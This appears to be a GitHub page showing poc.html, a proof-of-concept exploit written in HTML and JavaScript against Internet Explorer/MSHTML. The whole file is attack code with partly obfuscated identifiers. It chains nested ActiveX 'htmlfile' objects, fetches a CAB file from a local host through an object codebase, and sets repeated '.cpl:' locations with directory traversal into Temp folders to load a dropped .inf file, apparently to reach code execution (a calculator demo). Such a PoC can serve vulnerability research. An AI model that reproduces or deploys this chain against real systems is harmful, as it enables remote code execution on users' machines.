-
Notifications
You must be signed in to change notification settings - Fork 50
/
poc.html
76 lines (75 loc) · 3.23 KB
/
poc.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function exploit() {
var x = window["document"];
var then = window["Document"]["prototype"]["createElement"];
var _0x4d7c02 = window["Document"]["prototype"]["write"];
var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
var range = then["call"](x, "iframe");
try {
PL$22["call"](x["body"], range);
} catch (errx) {
PL$22["call"](x["documentElement"], range);
}
var ACTIVEX = range["contentWindow"]["ActiveXObject"];
var view = new ACTIVEX("htmlfile");
range["contentDocument"]["open"]()["close"]();
try {
opfilter["call"](x["body"], range);
} catch (err) {
opfilter["call"](x["documentElement"], range);
}
view["open"]()["close"]();
var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
mappedObj["open"]()["close"]();
var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
TokenType["open"]()["close"]();
var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
model["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var wmp_test = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var errors = window["XMLHttpRequest"];
var $node = new errors;
var directiveProcessors = errors["prototype"]["open"];
var nodeTypeRender = errors["prototype"]["send"];
var newAttributes = window["setTimeout"];
directiveProcessors["call"]($node, "GET", "http://127.0.0.1/calc.cab", ![]);
nodeTypeRender["call"]($node);
model["Script"]["document"]["write"]("<body>");
var PL$41 = then["call"](model["Script"]["document"], "object");
PL$41["setAttribute"]("codebase", "http://127.0.0.1/calc.cab#version=5,0,0,0");
PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](model["Script"]["document"]["body"], PL$41);
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/calc.inf";
rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/calc.inf";
wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/calc.inf";
doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/calc.inf";
a["Script"]["location"] = ".cpl:../../../../../Temp/Low/calc.inf";
doc["Script"]["location"] = ".cpl:../../../../../Temp/calc.inf";
doc["Script"]["location"] = ".cpl:../../Low/calc.inf";
doc["Script"]["location"] = ".cpl:../../calc.inf";
}
exploit();
</script>
</body>
</html>